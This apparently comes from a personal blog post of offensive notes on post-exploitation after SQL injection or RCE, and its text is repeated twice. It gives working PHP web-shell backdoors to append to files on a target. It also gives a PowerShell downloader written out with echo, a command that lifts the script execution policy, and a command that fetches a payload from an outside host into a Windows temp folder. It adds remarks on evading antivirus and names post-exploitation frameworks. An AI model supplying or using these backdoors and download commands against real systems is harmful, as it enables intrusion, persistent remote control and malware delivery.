Just to keep for my notes and reference. Because sometime hard to recall back on #HowTo
Ok, let's assume that we are able to inject some malicious payload/code like using phpMyAdmin or whatever low-hanging fruits on the target SQLi, RCE or whatever.
1. For PHP these are the useful code:
========
PHP Info
========
<? phpinfo(); ?>
This might be useful for us to identify file path and default folder etc.
================
Simple PHP Backdoor
================
<?php system($_GET['cmd']); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
This one the most 'clean' version. Both of the code are in one line, we can simply append it into another filename that we like.
2. In order for us to perform the privilege escalation attack its depend on the target platform. Either the target is running on Windows or Linux. These two type of architecture have a different method to do it.
If the target are running Windows we can use powershell. As we know most of the Windows operating system by default have the powershell capabilities. Good thing about powershell some of the Anti-Virus/Malware are ignore if any command are execute.
As we know Windows does not have a wget or curl command to download from any or other external resources that we wanted to. To do that, with the existing shell that we append earlier, we can use echo command to write a new payload in order for us to use it.
First we create a new file called download.ps1:
================
Copy & Execute This
================
echo param($url, $filename) > download.ps1
echo $client = new-object System.Net.WebClient >> download.ps1
echo $client.DownloadFile( $url, $filename); >> download.ps1
The expected output of file should place the one that we echo line-by-line like these;
$ type download.ps1
param($url, $filename)
$client = new-object System.Net.WebClient
$client.DownloadFile( $url, $filename);
Next run this command:
$ powershell Set-ExecutionPolicy Unrestricted
This is to make sure that we had no restriction while we run the script.
$ powershell -ExecutionPolicy RemoteSigned -File "download.ps1" "http://somewhere.com/filename.ext" "C:\Windows\Temp\filename.ext"
The last command that we wanted to run. Make sure that both URL and file path that are set right before we execute it.
Another thing that I been wondering about these powershell is there any Webshell for Powershell? Yes we have it! While do some Google I found --> this "Antak-WebShell" It is written in ASP.Net and its not support PHP :( But if you get lucky, some of Microsoft web server are running both PHP & IIS this is where we can use this.
Since we have this nice WebShell we can rely on another tools like Empire, PowerSploit or Nishang for post exploitation.
As for the conclusion, the step-by-step walkthrough may be in pain or you might get stuck on while working on this. Maybe you have a better technique to simplyfied it? Anyway, good luck with spawning the $HELL Cheers!!!
See 'clam' for more and `bash' for a shell script!
___
.-"; ! ;"-.
.'! : | : !`.
/\ ! : ! : ! /\
/\ | ! :|: ! | /\
( \ \ ; :!: ; / / )
( `. \ | !:|:! | / .' )
(`. \ \ \!:|:!/ / / .')
\ `.`.\ |!|! |/,'.' /
`._`.\\\!!!// .'_.'
`.`.\\|//.'.'
|`._`n'_.'| hjw
"----^----"
Ok, let's assume that we are able to inject some malicious payload/code like using phpMyAdmin or whatever low-hanging fruits on the target SQLi, RCE or whatever.
1. For PHP these are the useful code:
========
PHP Info
========
<? phpinfo(); ?>
This might be useful for us to identify file path and default folder etc.
================
Simple PHP Backdoor
================
<?php system($_GET['cmd']); ?>
or
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
This one the most 'clean' version. Both of the code are in one line, we can simply append it into another filename that we like.
2. In order for us to perform the privilege escalation attack its depend on the target platform. Either the target is running on Windows or Linux. These two type of architecture have a different method to do it.
If the target are running Windows we can use powershell. As we know most of the Windows operating system by default have the powershell capabilities. Good thing about powershell some of the Anti-Virus/Malware are ignore if any command are execute.
As we know Windows does not have a wget or curl command to download from any or other external resources that we wanted to. To do that, with the existing shell that we append earlier, we can use echo command to write a new payload in order for us to use it.
First we create a new file called download.ps1:
================
Copy & Execute This
================
echo param($url, $filename) > download.ps1
echo $client = new-object System.Net.WebClient >> download.ps1
echo $client.DownloadFile( $url, $filename); >> download.ps1
The expected output of file should place the one that we echo line-by-line like these;
$ type download.ps1
param($url, $filename)
$client = new-object System.Net.WebClient
$client.DownloadFile( $url, $filename);
Next run this command:
$ powershell Set-ExecutionPolicy Unrestricted
This is to make sure that we had no restriction while we run the script.
$ powershell -ExecutionPolicy RemoteSigned -File "download.ps1" "http://somewhere.com/filename.ext" "C:\Windows\Temp\filename.ext"
The last command that we wanted to run. Make sure that both URL and file path that are set right before we execute it.
Another thing that I been wondering about these powershell is there any Webshell for Powershell? Yes we have it! While do some Google I found --> this "Antak-WebShell" It is written in ASP.Net and its not support PHP :( But if you get lucky, some of Microsoft web server are running both PHP & IIS this is where we can use this.
Since we have this nice WebShell we can rely on another tools like Empire, PowerSploit or Nishang for post exploitation.
As for the conclusion, the step-by-step walkthrough may be in pain or you might get stuck on while working on this. Maybe you have a better technique to simplyfied it? Anyway, good luck with spawning the $HELL Cheers!!!
Comments
Post a Comment